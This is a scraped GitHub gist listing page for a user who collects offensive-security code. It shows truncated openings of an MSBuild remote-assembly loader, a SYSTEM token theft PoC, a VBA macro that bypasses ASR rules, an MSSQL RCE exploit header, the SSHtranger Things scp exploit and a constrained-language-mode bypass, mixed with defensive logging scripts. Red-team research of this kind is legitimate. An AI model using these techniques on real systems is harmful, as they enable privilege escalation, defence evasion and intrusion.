sasqwatch

💭
I may be slow to respond.
View GitHub Profile
package main
/*
*
* This is just a Go implementation of https://github.com/monoxgas/sRDI/
* Useful if you're trying to generate shellcode for reflective DLL
* injection in Go, otherwise probably not much use :)
*
* The project, shellcode, most comments within this project
* are all from the original project by @SilentBreakSec's Nick Landers (@monoxgas)
@sasqwatch
sasqwatch / msBuildDemo.xml
Created January 31, 2019 23:52 — forked from G0ldenGunSec/msBuildDemo.xml
MSBuild payload used to execute a remotely-hosted .net assembly
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="DemoClass">
<ClassExample />
</Target>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Code Type="Class" Language="cs">
# These values were obtained from: logman query providers Microsoft-Windows-Kernel-Process
$WINEVENT_KEYWORD_PROCESS = 0x10
$WINEVENT_KEYWORD_IMAGE = 0x40
# Normally when you enable an analytic log, all keywords are logged, which can be very noisy.
# I'm going to limit collection to only image and process events
$KernelProcessLog = New-Object -TypeName System.Diagnostics.Eventing.Reader.EventLogConfiguration -ArgumentList 'Microsoft-Windows-Kernel-Process/Analytic'
$KernelProcessLog.ProviderKeywords = ($WINEVENT_KEYWORD_PROCESS -bor $WINEVENT_KEYWORD_IMAGE)
$KernelProcessLog.ProviderLevel = 0xFF
$KernelProcessLog.IsEnabled = $true
@sasqwatch
sasqwatch / getsystem_parent.cpp
Created January 30, 2019 22:08 — forked from xpn/getsystem_parent.cpp
A POC to grab SYSTEM token privileges via PROC_THREAD_ATTRIBUTE_PARENT_PROCESS
#include "stdafx.h"
BOOL SetPrivilege(HANDLE hToken, LPCTSTR Privilege, BOOL bEnablePrivilege) {
TOKEN_PRIVILEGES tp;
LUID luid;
TOKEN_PRIVILEGES tpPrevious;
DWORD cbPrevious = sizeof(TOKEN_PRIVILEGES);
if (!LookupPrivilegeValue(NULL, Privilege, &luid)) return FALSE;
@sasqwatch
sasqwatch / ASR Rules Bypass.vba
Created January 30, 2019 21:35 — forked from infosecn1nja/ASR Rules Bypass.vba
ASR rules bypass creating child processes
' ASR rules bypass creating child processes
' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction
' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule
Sub ASR_blocked()
Dim WSHShell As Object
Set WSHShell = CreateObject("Wscript.Shell")
WSHShell.Run "cmd.exe"
End Sub
@sasqwatch
sasqwatch / bad_sequel.py
Created January 29, 2019 00:47 — forked from 3xocyte/bad_sequel.py
PoC MSSQL RCE exploit using Resource-Based Constrained Delegation
#!/usr/bin/env python
# for more info: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
# this is a rough PoC
# requirements for RCE:
# - the attacker needs to either have or create an object with a service principal name
# - the MSSQL server has to be running under the context of System/Network Service/a virtual account
# - the MSSQL server has the WebClient service installed and running (not default on Windows Server hosts)
# - NTLM has to be in use
@sasqwatch
sasqwatch / sshtranger_things.py
Created January 23, 2019 19:20 — forked from mehaase/sshtranger_things.py
SSHtranger Things Exploit POC
'''
Title: SSHtranger Things
Author: Mark E. Haase <[email protected]>
Homepage: https://www.hyperiongray.com
Date: 2019-01-17
CVE: CVE-2019-6111, CVE-2019-6110
Advisory: https://sintonen.fi/advisories/scp-client-multiple-vulnerabilities.txt
Tested on: Ubuntu 18.04.1 LTS, OpenSSH client 7.6p1
We have nicknamed this "SSHtranger Things" because the bug is so old it could be
@sasqwatch
sasqwatch / RunscripthelperBypass.ps1
Created January 22, 2019 18:41 — forked from mattifestation/RunscripthelperBypass.ps1
PowerShell weaponization for the runscripthelper.exe constrained language mode bypass
function Invoke-RunScriptHelperExpression {
<#
.SYNOPSIS
Executes PowerShell code in full language mode in the context of runscripthelper.exe.
.DESCRIPTION
Invoke-RunScriptHelperExpression executes PowerShell code in the context of runscripthelper.exe - a Windows-signed PowerShell host application which appears to be used for telemetry collection purposes. The PowerShell code supplied will run in FullLanguage mode and bypass constrained language mode.
# Create a temp dir in which to copy the drivers to whitelist
mkdir ScanMe
Get-WinEvent -LogName 'Microsoft-Windows-CodeIntegrity/Operational' -FilterXPath '*[System[EventID=3076]]' | ForEach-Object {
$DriverPath = $_.Properties[1].Value
# Normalize the paths
switch -Wildcard ($DriverPath) {
'\Device\HarddiskVolume4\*' { $DriverPath = "C:\$($DriverPath.Replace('\Device\HarddiskVolume4\', ''))" }
'System32*' { $DriverPath = "C:\Windows\$DriverPath" }
${🤷} = New-Object Reflection.Emit.DynamicMethod('💩', [UInt32], @([UInt32], [UInt32]))
${🤔} = ${🤷}.GetILGenerator()
@(@(2, 275120805),@(3, 275120805),@(88, -261739867),@(42, 23440101)) | % {
${🤔}.Emit([Activator]::CreateInstance([System.Reflection.Emit.OpCode], [Reflection.BindingFlags] 'NonPublic, Instance', $null, @(($_[0] -as [System.Reflection.Emit.OpCode].Assembly.GetType('System.Reflection.Emit.OpCodeValues')), $_[1]), $null))
}
${💩} = ${🤷}.CreateDelegate([Func``3[UInt32, UInt32, UInt32]])
${💩}.Invoke(2,3)